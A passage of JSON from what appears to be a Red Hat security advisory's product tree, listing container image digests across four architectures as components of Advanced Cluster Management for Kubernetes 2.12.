"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
